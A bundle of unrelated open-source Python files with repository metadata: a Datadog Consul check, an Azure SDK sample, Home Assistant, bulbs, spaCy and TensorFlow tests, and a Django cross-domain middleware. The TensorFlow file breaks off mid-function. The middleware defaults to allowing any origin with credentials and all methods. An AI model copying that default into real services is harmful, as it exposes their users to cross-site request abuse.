# 3. The Datadog agent is not able to reach the Consul instance (network partition et al.)
self.log.warn('Consul Leader information is not available!')
return
if not instance_state.last_known_leader:
# We have no state preserved, store some and return
instance_state.last_known_leader = leader
return
agent = self._get_agent_url(instance, instance_state)
agent_dc = self._get_agent_datacenter(instance, instance_state)
if leader != instance_state.last_known_leader:
# There was a leadership change
if perform_new_leader_checks or (perform_self_leader_check and agent == leader):
# We either emit all leadership changes or emit when we become the leader and that just happened
self.log.info(('Leader change from {0} to {1}. Sending new leader event').format(
instance_state.last_known_leader, leader))
self.event({
"timestamp": int(datetime.now().strftime("%s")),
"event_type": "consul.new_leader",
"source_type_name": self.SOURCE_TYPE_NAME,
"msg_title": "New Consul Leader Elected in consul_datacenter:{0}".format(agent_dc),
"aggregation_key": "consul.new_leader",
"msg_text": "The Node at {0} is the new leader of the consul datacenter {1}".format(
leader,
agent_dc
),
"tags": ["prev_consul_leader:{0}".format(instance_state.last_known_leader),
"curr_consul_leader:{0}".format(leader),
"consul_datacenter:{0}".format(agent_dc)]
})
instance_state.last_known_leader = leader
### Consul Catalog Accessors
def get_peers_in_cluster(self, instance):
return self.consul_request(instance, '/v1/status/peers') or []
def get_services_in_cluster(self, instance):
return self.consul_request(instance, '/v1/catalog/services')
def get_nodes_with_service(self, instance, service):
consul_request_url = '/v1/health/service/{0}'.format(service)
return self.consul_request(instance, consul_request_url)
def _cull_services_list(self, services, service_whitelist, max_services=MAX_SERVICES):
if service_whitelist:
if len(service_whitelist) > max_services:
self.warning('More than %d services in whitelist. Service list will be truncated.' % max_services)
services = [s for s in services if s in service_whitelist][:max_services]
else:
if len(services) <= max_services:
self.log.debug('Consul service whitelist not defined. Agent will poll for all %d services found', len(services))
else:
self.warning('Consul service whitelist not defined. Agent will poll for at most %d services' % max_services)
services = list(islice(services.iterkeys(), 0, max_services))
return services
def check(self, instance):
# Instance state is mutable, any changes to it will be reflected in self._instance_states
instance_state = self._instance_states[hash_mutable(instance)]
self._check_for_leader_change(instance, instance_state)
peers = self.get_peers_in_cluster(instance)
main_tags = []
agent_dc = self._get_agent_datacenter(instance, instance_state)
if agent_dc is not None:
main_tags.append('consul_datacenter:{0}'.format(agent_dc))
for tag in instance.get('tags', []):
main_tags.append(tag)
if not self._is_instance_leader(instance, instance_state):
self.gauge("consul.peers", len(peers), tags=main_tags + ["mode:follower"])
self.log.debug("This consul agent is not the cluster leader." +
"Skipping service and catalog checks for this instance")
return
else:
self.gauge("consul.peers", len(peers), tags=main_tags + ["mode:leader"])
service_check_tags = ['consul_url:{0}'.format(instance.get('url'))]
perform_catalog_checks = instance.get('catalog_checks',
self.init_config.get('catalog_checks'))
perform_network_latency_checks = instance.get('network_latency_checks',
self.init_config.get('network_latency_checks'))
try:
# Make service checks from health checks for all services in catalog
health_state = self.consul_request(instance, '/v1/health/state/any')
sc = {}
# compute the highest status level (OK < WARNING < CRITICAL) a a check among all the nodes is running on.
for check in health_state:
sc_id = '{0}/{1}/{2}'.format(check['CheckID'], check.get('ServiceID', ''), check.get('ServiceName', ''))
status = self.STATUS_SC.get(check['Status'])
if status is None:
status = AgentCheck.UNKNOWN
if sc_id not in sc:
tags = ["check:{0}".format(check["CheckID"])]
if check["ServiceName"]:
tags.append("service:{0}".format(check["ServiceName"]))
if check["ServiceID"]:
tags.append("consul_service_id:{0}".format(check["ServiceID"]))
sc[sc_id] = {'status': status, 'tags': tags}
elif self.STATUS_SEVERITY[status] > self.STATUS_SEVERITY[sc[sc_id]['status']]:
sc[sc_id]['status'] = status
for s in sc.values():
self.service_check(self.HEALTH_CHECK, s['status'], tags=main_tags+s['tags'])
except Exception as e:
self.log.error(e)
self.service_check(self.CONSUL_CHECK, AgentCheck.CRITICAL,
tags=service_check_tags)
else:
self.service_check(self.CONSUL_CHECK, AgentCheck.OK,
tags=service_check_tags)
if perform_catalog_checks:
# Collect node by service, and service by node counts for a whitelist of services
services = self.get_services_in_cluster(instance)
service_whitelist = instance.get('service_whitelist',
self.init_config.get('service_whitelist', []))
max_services = instance.get('max_services',
self.init_config.get('max_services', self.MAX_SERVICES))
services = self._cull_services_list(services, service_whitelist, max_services)
# {node_id: {"up: 0, "passing": 0, "warning": 0, "critical": 0}
nodes_to_service_status = defaultdict(lambda: defaultdict(int))
for service in services:
# For every service in the cluster,
# Gauge the following:
# `consul.catalog.nodes_up` : # of Nodes registered with that service
# `consul.catalog.nodes_passing` : # of Nodes with service status `passing` from those registered
# `consul.catalog.nodes_warning` : # of Nodes with service status `warning` from those registered
# `consul.catalog.nodes_critical` : # of Nodes with service status `critical` from those registered
service_tags = ['consul_service_id:{0}'.format(service)]
nodes_with_service = self.get_nodes_with_service(instance, service)
# {'up': 0, 'passing': 0, 'warning': 0, 'critical': 0}
node_status = defaultdict(int)
for node in nodes_with_service:
# The node_id is n['Node']['Node']
node_id = node.get('Node', {}).get("Node")
# An additional service is registered on this node. Bump up the counter
nodes_to_service_status[node_id]["up"] += 1
# If there is no Check for the node then Consul and dd-agent consider it up
if 'Checks' not in node:
node_status['passing'] += 1
node_status['up'] += 1
else:
found_critical = False
found_warning = False
found_serf_health = False
for check in node['Checks']:
if check['CheckID'] == 'serfHealth':
found_serf_health = True
# For backwards compatibility, the "up" node_status is computed
# based on the total # of nodes 'running' as part of the service.
# If the serfHealth is `critical` it means the Consul agent isn't even responding,
# and we don't register the node as `up`
if check['Status'] != 'critical':
node_status["up"] += 1
continue
if check['Status'] == 'critical':
found_critical = True
break
elif check['Status'] == 'warning':
found_warning = True
# Keep looping in case there is a critical status
# Increment the counters based on what was found in Checks
# `critical` checks override `warning`s, and if neither are found, register the node as `passing`
if found_critical:
node_status['critical'] += 1
nodes_to_service_status[node_id]["critical"] += 1
elif found_warning:
node_status['warning'] += 1
nodes_to_service_status[node_id]["warning"] += 1
else:
if not found_serf_health:
# We have not found a serfHealth check for this node, which is unexpected
# If we get here assume this node's status is "up", since we register it as 'passing'
node_status['up'] += 1
node_status['passing'] += 1
nodes_to_service_status[node_id]["passing"] += 1
for status_key in self.STATUS_SC:
status_value = node_status[status_key]
self.gauge(
'{0}.nodes_{1}'.format(self.CONSUL_CATALOG_CHECK, status_key),
status_value,
tags=main_tags+service_tags
)
for node, service_status in nodes_to_service_status.iteritems():
# For every node discovered for whitelisted services, gauge the following:
# `consul.catalog.services_up` : Total services registered on node
# `consul.catalog.services_passing` : Total passing services on node
# `consul.catalog.services_warning` : Total warning services on node
# `consul.catalog.services_critical` : Total critical services on node
node_tags = ['consul_node_id:{0}'.format(node)]
self.gauge('{0}.services_up'.format(self.CONSUL_CATALOG_CHECK),
len(services),
tags=main_tags+node_tags)
for status_key in self.STATUS_SC:
status_value = service_status[status_key]
self.gauge(
'{0}.services_{1}'.format(self.CONSUL_CATALOG_CHECK, status_key),
status_value,
tags=main_tags+node_tags
)
if perform_network_latency_checks:
self.check_network_latency(instance, agent_dc, main_tags)
def _get_coord_datacenters(self, instance):
return self.consul_request(instance, '/v1/coordinate/datacenters')
def _get_coord_nodes(self, instance):
return self.consul_request(instance, 'v1/coordinate/nodes')
def check_network_latency(self, instance, agent_dc, main_tags):
datacenters = self._get_coord_datacenters(instance)
for datacenter in datacenters:
name = datacenter['Datacenter']
if name == agent_dc:
# This is us, time to collect inter-datacenter data
for other in datacenters:
other_name = other['Datacenter']
if name == other_name:
# Ignore ourself
continue
latencies = []
for node_a in datacenter['Coordinates']:
for node_b in other['Coordinates']:
latencies.append(distance(node_a, node_b))
latencies.sort()
tags = main_tags + ['source_datacenter:{}'.format(name),
'dest_datacenter:{}'.format(other_name)]
n = len(latencies)
half_n = int(floor(n / 2))
if n % 2:
median = latencies[half_n]
else:
median = (latencies[half_n - 1] + latencies[half_n]) / 2
self.gauge('consul.net.dc.latency.min', latencies[0], hostname='', tags=tags)
self.gauge('consul.net.dc.latency.median', median, hostname='', tags=tags)
self.gauge('consul.net.dc.latency.max', latencies[-1], hostname='', tags=tags)
# We've found ourself, we can move on
break
# Intra-datacenter
nodes = self._get_coord_nodes(instance)
if len(nodes) == 1:
self.log.debug("Only 1 node in cluster, skipping network latency metrics.")
else:
for node in nodes:
node_name = node['Node']
latencies = []
for other in nodes:
other_name = other['Node']
if node_name == other_name:
continue
latencies.append(distance(node, other))
latencies.sort()
n = len(latencies)
half_n = int(floor(n / 2))
if n % 2:
median = latencies[half_n]
else:
median = (latencies[half_n - 1] + latencies[half_n]) / 2
self.gauge('consul.net.node.latency.min', latencies[0], hostname=node_name, tags=main_tags)
self.gauge('consul.net.node.latency.p25', latencies[ceili(n * 0.25) - 1], hostname=node_name, tags=main_tags)
self.gauge('consul.net.node.latency.median', median, hostname=node_name, tags=main_tags)
self.gauge('consul.net.node.latency.p75', latencies[ceili(n * 0.75) - 1], hostname=node_name, tags=main_tags)
self.gauge('consul.net.node.latency.p90', latencies[ceili(n * 0.90) - 1], hostname=node_name, tags=main_tags)
self.gauge('consul.net.node.latency.p95', latencies[ceili(n * 0.95) - 1], hostname=node_name, tags=main_tags)
self.gauge('consul.net.node.latency.p99', latencies[ceili(n * 0.99) - 1], hostname=node_name, tags=main_tags)
self.gauge('consul.net.node.latency.max', latencies[-1], hostname=node_name, tags=main_tags)
| {
"content_hash": "b5f0e61b946e73cd07a55cc2929e2295",
"timestamp": "",
"source": "github",
"line_count": 463,
"max_line_length": 142,
"avg_line_length": 46.60259179265659,
"alnum_prop": 0.5514668396904111,
"repo_name": "itsuugo/integrations-core",
"id": "0207d75cea4ff7a29950179cea2677832d6ebd81",
"size": "21693",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "consul/check.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "2692"
},
{
"name": "Erlang",
"bytes": "15429"
},
{
"name": "Go",
"bytes": "1471"
},
{
"name": "Nginx",
"bytes": "1173"
},
{
"name": "PLSQL",
"bytes": "28501"
},
{
"name": "Perl",
"bytes": "5845"
},
{
"name": "Python",
"bytes": "1733132"
},
{
"name": "Ruby",
"bytes": "177186"
},
{
"name": "Shell",
"bytes": "11831"
}
],
"symlink_target": ""
} |
from azure.identity import DefaultAzureCredential
from azure.mgmt.datamigration import DataMigrationManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datamigration
# USAGE
python tasks_update.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = DataMigrationManagementClient(
credential=DefaultAzureCredential(),
subscription_id="fc04246f-04c5-437e-ac5e-206a19e7193f",
)
response = client.tasks.update(
group_name="DmsSdkRg",
service_name="DmsSdkService",
project_name="DmsSdkProject",
task_name="DmsSdkTask",
parameters={
"properties": {
"input": {
"targetConnectionInfo": {
"authentication": "SqlAuthentication",
"dataSource": "ssma-test-server.database.windows.net",
"encryptConnection": True,
"password": "testpassword",
"trustServerCertificate": True,
"type": "SqlConnectionInfo",
"userName": "testuser",
}
},
"taskType": "ConnectToTarget.SqlDb",
}
},
)
print(response)
# x-ms-original-file: specification/datamigration/resource-manager/Microsoft.DataMigration/preview/2022-03-30-preview/examples/Tasks_Update.json
if __name__ == "__main__":
main()
| {
"content_hash": "7fc271a33d69481eb8393df169aaa9c5",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 144,
"avg_line_length": 35.568627450980394,
"alnum_prop": 0.6085997794928335,
"repo_name": "Azure/azure-sdk-for-python",
"id": "28d46d756d2b260d947b001f689e297d31e10a1c",
"size": "2282",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/datamigration/azure-mgmt-datamigration/generated_samples/tasks_update.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
"""The tests for NEW_NAME device actions."""
import pytest
from homeassistant.components import automation
from homeassistant.components.NEW_DOMAIN import DOMAIN
from homeassistant.core import HomeAssistant
from homeassistant.helpers import device_registry, entity_registry
from homeassistant.setup import async_setup_component
from tests.common import (
MockConfigEntry,
assert_lists_same,
async_get_device_automations,
async_mock_service,
mock_device_registry,
mock_registry,
)
@pytest.fixture
def device_reg(hass: HomeAssistant) -> device_registry.DeviceRegistry:
"""Return an empty, loaded, registry."""
return mock_device_registry(hass)
@pytest.fixture
def entity_reg(hass: HomeAssistant) -> entity_registry.EntityRegistry:
"""Return an empty, loaded, registry."""
return mock_registry(hass)
async def test_get_actions(
hass: HomeAssistant,
device_reg: device_registry.DeviceRegistry,
entity_reg: entity_registry.EntityRegistry,
) -> None:
"""Test we get the expected actions from a NEW_DOMAIN."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(DOMAIN, "test", "5678", device_id=device_entry.id)
expected_actions = [
{
"domain": DOMAIN,
"type": "turn_on",
"device_id": device_entry.id,
"entity_id": "NEW_DOMAIN.test_5678",
},
{
"domain": DOMAIN,
"type": "turn_off",
"device_id": device_entry.id,
"entity_id": "NEW_DOMAIN.test_5678",
},
]
actions = await async_get_device_automations(hass, "action", device_entry.id)
assert_lists_same(actions, expected_actions)
async def test_action(hass: HomeAssistant) -> None:
"""Test for turn_on and turn_off actions."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {
"platform": "event",
"event_type": "test_event_turn_off",
},
"action": {
"domain": DOMAIN,
"device_id": "abcdefgh",
"entity_id": "NEW_DOMAIN.entity",
"type": "turn_off",
},
},
{
"trigger": {
"platform": "event",
"event_type": "test_event_turn_on",
},
"action": {
"domain": DOMAIN,
"device_id": "abcdefgh",
"entity_id": "NEW_DOMAIN.entity",
"type": "turn_on",
},
},
]
},
)
turn_off_calls = async_mock_service(hass, "NEW_DOMAIN", "turn_off")
turn_on_calls = async_mock_service(hass, "NEW_DOMAIN", "turn_on")
hass.bus.async_fire("test_event_turn_off")
await hass.async_block_till_done()
assert len(turn_off_calls) == 1
assert len(turn_on_calls) == 0
hass.bus.async_fire("test_event_turn_on")
await hass.async_block_till_done()
assert len(turn_off_calls) == 1
assert len(turn_on_calls) == 1
| {
"content_hash": "31e0d15d294b56be7fccd2d5423f7126",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 85,
"avg_line_length": 32.596330275229356,
"alnum_prop": 0.550520686743597,
"repo_name": "kennedyshead/home-assistant",
"id": "424fa0a9afd08ca281e3ee97f2504f20dc2c0f06",
"size": "3553",
"binary": false,
"copies": "8",
"ref": "refs/heads/dev",
"path": "script/scaffold/templates/device_action/tests/test_device_action.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "33970989"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
} |
from django import http
try:
from django.conf import settings
XS_SHARING_ALLOWED_ORIGINS = settings.XS_SHARING_ALLOWED_ORIGINS
XS_SHARING_ALLOWED_METHODS = settings.XS_SHARING_ALLOWED_METHODS
XS_SHARING_ALLOWED_HEADERS = settings.XS_SHARING_ALLOWED_HEADERS
XS_SHARING_ALLOWED_CREDENTIALS = settings.XS_SHARING_ALLOWED_CREDENTIALS
except AttributeError:
XS_SHARING_ALLOWED_ORIGINS = '*'
XS_SHARING_ALLOWED_METHODS = ['POST', 'GET', 'OPTIONS', 'PUT', 'DELETE']
XS_SHARING_ALLOWED_HEADERS = ['Content-Type', '*']
XS_SHARING_ALLOWED_CREDENTIALS = 'true'
class XsSharing(object):
"""
This middleware allows cross-domain XHR using the html5 postMessage API.
Access-Control-Allow-Origin: http://foo.example
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Based off https://gist.github.com/426829
"""
def process_request(self, request):
if 'HTTP_ACCESS_CONTROL_REQUEST_METHOD' in request.META:
response = http.HttpResponse()
response['Access-Control-Allow-Origin'] = XS_SHARING_ALLOWED_ORIGINS
response['Access-Control-Allow-Methods'] = ",".join( XS_SHARING_ALLOWED_METHODS )
response['Access-Control-Allow-Headers'] = ",".join( XS_SHARING_ALLOWED_HEADERS )
response['Access-Control-Allow-Credentials'] = XS_SHARING_ALLOWED_CREDENTIALS
return response
return None
def process_response(self, request, response):
response['Access-Control-Allow-Origin'] = XS_SHARING_ALLOWED_ORIGINS
response['Access-Control-Allow-Methods'] = ",".join( XS_SHARING_ALLOWED_METHODS )
response['Access-Control-Allow-Headers'] = ",".join( XS_SHARING_ALLOWED_HEADERS )
response['Access-Control-Allow-Credentials'] = XS_SHARING_ALLOWED_CREDENTIALS
return response | {
"content_hash": "fe644a8cf07646afa88eb0ddcb82b65d",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 94,
"avg_line_length": 44.214285714285715,
"alnum_prop": 0.6882067851373183,
"repo_name": "ksiomelo/cubix",
"id": "77657be00729d733b0ccd73eaf5f2ea8db370a8b",
"size": "1857",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "middlewares/crossdomainxhr.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "42207"
},
{
"name": "HTML",
"bytes": "108713"
},
{
"name": "JavaScript",
"bytes": "1212584"
},
{
"name": "Python",
"bytes": "365304"
}
],
"symlink_target": ""
} |
import unittest
from bulbs.config import Config
from bulbs.tests import BulbsTestCase, bulbs_test_suite
from bulbs.neo4jserver import Graph, Neo4jClient, NEO4J_URI, \
VertexIndexProxy, EdgeIndexProxy, ExactIndex
from bulbs.tests import GremlinTestCase
config = Config(NEO4J_URI)
BulbsTestCase.client = Neo4jClient(config)
BulbsTestCase.vertex_index_proxy = VertexIndexProxy
BulbsTestCase.edge_index_proxy = EdgeIndexProxy
BulbsTestCase.index_class = ExactIndex
BulbsTestCase.graph = Graph(config)
def test_suite():
suite = bulbs_test_suite()
#suite.addTest(unittest.makeSuite(RestTestCase))
suite.addTest(unittest.makeSuite(GremlinTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| {
"content_hash": "583b9f465c1075654b9e57f36e85b797",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 62,
"avg_line_length": 32.56521739130435,
"alnum_prop": 0.7823765020026703,
"repo_name": "windj007/bulbs",
"id": "de7e017a71504e24dbb498347aeb76688e500675",
"size": "749",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bulbs/neo4jserver/tests/bulbs_tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Groovy",
"bytes": "17880"
},
{
"name": "Makefile",
"bytes": "650"
},
{
"name": "Python",
"bytes": "350466"
}
],
"symlink_target": ""
} |
from common_fixtures import * # NOQA
def test_zone_list(admin_client, client):
zones = admin_client.list_zone()
assert len(zones) > 0
zones = client.list_zone()
assert len(zones) >= 0
| {
"content_hash": "f796d23eac87f367890b33e65a4397f3",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 41,
"avg_line_length": 22.666666666666668,
"alnum_prop": 0.6519607843137255,
"repo_name": "alena1108/cattle",
"id": "b404a2cc273173f7f5864ebce63ad4e2fb82ef80",
"size": "204",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/integration/cattletest/core/test_zone.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "3287143"
},
{
"name": "Makefile",
"bytes": "6771"
},
{
"name": "Python",
"bytes": "193716"
},
{
"name": "Shell",
"bytes": "54068"
}
],
"symlink_target": ""
} |
from ...attrs import LIKE_NUM
# fmt: off
_num_words = [
"zero", "one", "two", "three", "four", "five", "six", "seven", "eight",
"nine", "ten", "eleven", "twelve", "thirteen", "fourteen", "fifteen",
"sixteen", "seventeen", "eighteen", "nineteen", "twenty", "thirty", "forty",
"fifty", "sixty", "seventy", "eighty", "ninety", "hundred", "thousand",
"million", "billion", "trillion", "quadrillion", "gajillion", "bazillion"
]
_ordinal_words = [
"first", "second", "third", "fourth", "fifth", "sixth", "seventh", "eighth",
"ninth", "tenth", "eleventh", "twelfth", "thirteenth", "fourteenth",
"fifteenth", "sixteenth", "seventeenth", "eighteenth", "nineteenth",
"twentieth", "thirtieth", "fortieth", "fiftieth", "sixtieth", "seventieth",
"eightieth", "ninetieth", "hundredth", "thousandth", "millionth", "billionth",
"trillionth", "quadrillionth", "gajillionth", "bazillionth"
]
# fmt: on
def like_num(text: str) -> bool:
if text.startswith(("+", "-", "±", "~")):
text = text[1:]
text = text.replace(",", "").replace(".", "")
if text.isdigit():
return True
if text.count("/") == 1:
num, denom = text.split("/")
if num.isdigit() and denom.isdigit():
return True
text_lower = text.lower()
if text_lower in _num_words:
return True
# Check ordinal number
if text_lower in _ordinal_words:
return True
if text_lower.endswith("th"):
if text_lower[:-2].isdigit():
return True
return False
LEX_ATTRS = {LIKE_NUM: like_num}
| {
"content_hash": "0dd309d6a8ae26c4e8690bfd06deaa6d",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 82,
"avg_line_length": 35.86363636363637,
"alnum_prop": 0.5754119138149556,
"repo_name": "spacy-io/spaCy",
"id": "fcc7c6bf2dbc0435f17f082165cbca55d286d6ed",
"size": "1579",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spacy/lang/en/lex_attrs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "567025"
},
{
"name": "C++",
"bytes": "12785"
},
{
"name": "CSS",
"bytes": "57480"
},
{
"name": "Groff",
"bytes": "188349"
},
{
"name": "HTML",
"bytes": "582292"
},
{
"name": "JavaScript",
"bytes": "54065"
},
{
"name": "M4",
"bytes": "11398"
},
{
"name": "Makefile",
"bytes": "256492"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "PostScript",
"bytes": "460967"
},
{
"name": "Python",
"bytes": "682585"
},
{
"name": "Shell",
"bytes": "95525"
}
],
"symlink_target": ""
} |
"""Tests for QueueRunner."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
class QueueRunnerTest(tf.test.TestCase):
def testBasic(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
qr = tf.train.QueueRunner(queue, [count_up_to])
threads = qr.create_threads(sess)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testTwoOps(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var0 = tf.Variable(zero64)
count_up_to_3 = var0.count_up_to(3)
var1 = tf.Variable(zero64)
count_up_to_30 = var1.count_up_to(30)
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, [count_up_to_3, count_up_to_30])
threads = qr.create_threads(sess)
tf.global_variables_initializer().run()
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
self.assertEqual(3, var0.eval())
self.assertEqual(30, var1.eval())
def testExceptionsCaptured(self):
with self.test_session() as sess:
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, ["i fail", "so fail"])
threads = qr.create_threads(sess)
tf.global_variables_initializer().run()
for t in threads:
t.start()
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(2, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
self.assertTrue("Operation not in the graph" in str(exceptions[1]))
def testRealDequeueEnqueue(self):
with self.test_session() as sess:
q0 = tf.FIFOQueue(3, tf.float32)
enqueue0 = q0.enqueue((10.0,))
close0 = q0.close()
q1 = tf.FIFOQueue(30, tf.float32)
enqueue1 = q1.enqueue((q0.dequeue(),))
dequeue1 = q1.dequeue()
qr = tf.train.QueueRunner(q1, [enqueue1])
threads = qr.create_threads(sess)
for t in threads:
t.start()
# Enqueue 2 values, then close queue0.
enqueue0.run()
enqueue0.run()
close0.run()
# Wait for the queue runner to terminate.
for t in threads:
t.join()
# It should have terminated cleanly.
self.assertEqual(0, len(qr.exceptions_raised))
# The 2 values should be in queue1.
self.assertEqual(10.0, dequeue1.eval())
self.assertEqual(10.0, dequeue1.eval())
# And queue1 should now be closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError, "is closed"):
dequeue1.eval()
def testRespectCoordShouldStop(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
qr = tf.train.QueueRunner(queue, [count_up_to])
# As the coordinator to stop. The queue runner should
# finish immediately.
coord = tf.train.Coordinator()
coord.request_stop()
threads = qr.create_threads(sess, coord)
for t in threads:
t.start()
coord.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 0.
self.assertEqual(0, var.eval())
def testRequestStopOnException(self):
with self.test_session() as sess:
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, ["not an op"])
coord = tf.train.Coordinator()
threads = qr.create_threads(sess, coord)
for t in threads:
t.start()
# The exception should be re-raised when joining.
with self.assertRaisesRegexp(ValueError, "Operation not in the graph"):
coord.join()
def testGracePeriod(self):
with self.test_session() as sess:
# The enqueue will quickly block.
queue = tf.FIFOQueue(2, tf.float32)
enqueue = queue.enqueue((10.0,))
dequeue = queue.dequeue()
qr = tf.train.QueueRunner(queue, [enqueue])
coord = tf.train.Coordinator()
qr.create_threads(sess, coord, start=True)
# Dequeue one element and then request stop.
dequeue.op.run()
time.sleep(0.02)
coord.request_stop()
# We should be able to join because the RequestStop() will cause
# the queue to be closed and the enqueue to terminate.
coord.join(stop_grace_period_secs=0.05)
def testMultipleSessions(self):
with self.test_session() as sess:
with tf.Session() as other_sess:
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
coord = tf.train.Coordinator()
qr = tf.train.QueueRunner(queue, [count_up_to])
# NOTE that this test does not actually start the threads.
threads = qr.create_threads(sess, coord=coord)
other_threads = qr.create_threads(other_sess, coord=coord)
self.assertEqual(len(threads), len(other_threads))
def testIgnoreMultiStarts(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
coord = tf.train.Coordinator()
qr = tf.train.QueueRunner(queue, [count_up_to])
threads = []
# NOTE that this test does not actually start the threads.
threads.extend(qr.create_threads(sess, coord=coord))
new_threads = qr.create_threads(sess, coord=coord)
self.assertEqual([], new_threads)
def testThreads(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
qr = tf.train.QueueRunner(queue, [count_up_to, "bad op"])
threads = qr.create_threads(sess, start=True)
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(1, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
threads = qr.create_threads(sess, start=True)
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(1, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
def testName(self):
with tf.name_scope("scope"):
queue = tf.FIFOQueue(10, tf.float32, name="queue")
qr = tf.train.QueueRunner(queue, [tf.no_op()])
self.assertEqual("scope/queue", qr.name)
tf.train.add_queue_runner(qr)
self.assertEqual(1, len(tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS,
"scope")))
def testStartQueueRunners(self):
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
init_op = tf.global_variables_initializer()
qr = tf.train.QueueRunner(queue, [count_up_to])
tf.train.add_queue_runner(qr)
with self.test_session() as sess:
init_op.run()
threads = tf.train.start_queue_runners(sess)
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testStartQueueRunnersNonDefaultGraph(self):
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
graph = tf.Graph()
with graph.as_default():
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
